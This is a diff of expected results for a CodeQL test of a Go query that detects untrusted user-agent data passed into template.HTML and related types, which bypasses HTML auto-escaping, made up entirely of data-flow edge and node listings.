+| HTMLTemplateEscapingPassthrough.go:90:16:90:77 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:91:38:91:46 | converted |
+| HTMLTemplateEscapingPassthrough.go:90:16:90:77 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:91:38:91:46 | converted |
+| HTMLTemplateEscapingPassthrough.go:90:16:90:77 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:91:38:91:46 | converted |
 nodes
 | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion | semmle.label | type conversion |
 | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
@@ -270,6 +278,22 @@ nodes
 | HTMLTemplateEscapingPassthrough.go:80:10:80:24 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:81:16:81:33 | type conversion | semmle.label | type conversion |
 | HTMLTemplateEscapingPassthrough.go:83:38:83:40 | src | semmle.label | src |
+| HTMLTemplateEscapingPassthrough.go:88:10:88:24 | call to UserAgent : string | semmle.label | call to UserAgent : string |
+| HTMLTemplateEscapingPassthrough.go:90:16:90:77 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:90:16:90:77 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:90:16:90:77 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:90:16:90:77 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:90:16:90:77 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:90:16:90:77 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:90:16:90:77 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:90:16:90:77 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:91:38:91:46 | converted | semmle.label | converted |
+| HTMLTemplateEscapingPassthrough.go:91:38:91:46 | converted | semmle.label | converted |
+| HTMLTemplateEscapingPassthrough.go:91:38:91:46 | converted | semmle.label | converted |
+| HTMLTemplateEscapingPassthrough.go:91:38:91:46 | converted | semmle.label | converted |
+| HTMLTemplateEscapingPassthrough.go:91:38:91:46 | converted | semmle.label | converted |
+| HTMLTemplateEscapingPassthrough.go:91:38:91:46 | converted | semmle.label | converted |
+| HTMLTemplateEscapingPassthrough.go:91:38:91:46 | converted | semmle.label | converted |
 #select
 | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion | converted |
 | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | Data from an $@ will not be auto-escaped because it was $@ to template.HTML | HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent | untrusted source | HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion | converted |

--- a/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.expected
+++ b/ql/test/experimental/CWE-79/HTMLTemplateEscapingPassthrough.expected
@@ -1,80 +1,266 @@
 edges
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
 | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : string | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a |
 | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
 | HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : string | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a |
 | HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
 | HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : string | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a |
 | HTMLTemplateEscapingPassthrough.go:39:19:39:33 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:39:19:39:33 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
 | HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : string | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c |
 | HTMLTemplateEscapingPassthrough.go:45:29:45:43 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:45:29:45:43 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
 | HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : string | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d |
 | HTMLTemplateEscapingPassthrough.go:49:23:49:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:49:23:49:37 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
 | HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : string | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e |
 | HTMLTemplateEscapingPassthrough.go:53:26:53:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:53:26:53:40 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
 | HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : string | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b |
 | HTMLTemplateEscapingPassthrough.go:57:24:57:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:57:24:57:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
+| HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : Srcset | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
 | HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : string | HTMLTemplateEscapingPassthrough.go:62:44:62:44 | f |
 | HTMLTemplateEscapingPassthrough.go:61:27:61:41 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:61:27:61:41 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:61:11:61:42 | type conversion : string |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
+| HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : URL | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
 | HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : string | HTMLTemplateEscapingPassthrough.go:66:38:66:38 | g |
 | HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion |
 | HTMLTemplateEscapingPassthrough.go:65:24:65:38 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:65:11:65:39 | type conversion : string |
-| HTMLTemplateEscapingPassthrough.go:74:16:74:30 | call to UserAgent : string | HTMLTemplateEscapingPassthrough.go:75:38:75:43 | caught |
 nodes
 | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : HTML | semmle.label | type conversion : HTML |
 | HTMLTemplateEscapingPassthrough.go:28:12:28:41 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:28:26:28:40 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:29:39:29:39 | a | semmle.label | a |
 | HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : HTML | semmle.label | type conversion : HTML |
 | HTMLTemplateEscapingPassthrough.go:34:9:34:38 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:34:23:34:37 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:35:40:35:40 | a | semmle.label | a |
 | HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
+| HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : HTML | semmle.label | type conversion : HTML |
 | HTMLTemplateEscapingPassthrough.go:39:9:39:34 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:39:19:39:33 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:39:19:39:33 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
+| HTMLTemplateEscapingPassthrough.go:40:40:40:40 | a | semmle.label | a |
 | HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
+| HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : HTMLAttr | semmle.label | type conversion : HTMLAttr |
 | HTMLTemplateEscapingPassthrough.go:45:11:45:44 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:45:29:45:43 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:45:29:45:43 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
+| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
+| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
+| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
+| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
+| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
+| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
+| HTMLTemplateEscapingPassthrough.go:46:41:46:41 | c | semmle.label | c |
 | HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
+| HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : JS | semmle.label | type conversion : JS |
 | HTMLTemplateEscapingPassthrough.go:49:11:49:38 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:49:23:49:37 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:49:23:49:37 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
+| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
+| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
+| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
+| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
+| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
+| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
+| HTMLTemplateEscapingPassthrough.go:50:44:50:44 | d | semmle.label | d |
 | HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
+| HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : JSStr | semmle.label | type conversion : JSStr |
 | HTMLTemplateEscapingPassthrough.go:53:11:53:41 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:53:26:53:40 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:53:26:53:40 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
+| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
+| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
+| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
+| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
+| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
+| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
+| HTMLTemplateEscapingPassthrough.go:54:44:54:44 | e | semmle.label | e |
 | HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion | semmle.label | type conversion |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
+| HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : CSS | semmle.label | type conversion : CSS |
 | HTMLTemplateEscapingPassthrough.go:57:11:57:39 | type conversion : string | semmle.label | type conversion : string |
 | HTMLTemplateEscapingPassthrough.go:57:24:57:38 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:57:24:57:38 | call to UserAgent : string | semmle.label | call to UserAgent : string |
 | HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
+| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
+| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
+| HTMLTemplateEscapingPassthrough.go:58:38:58:38 | b | semmle.label | b |
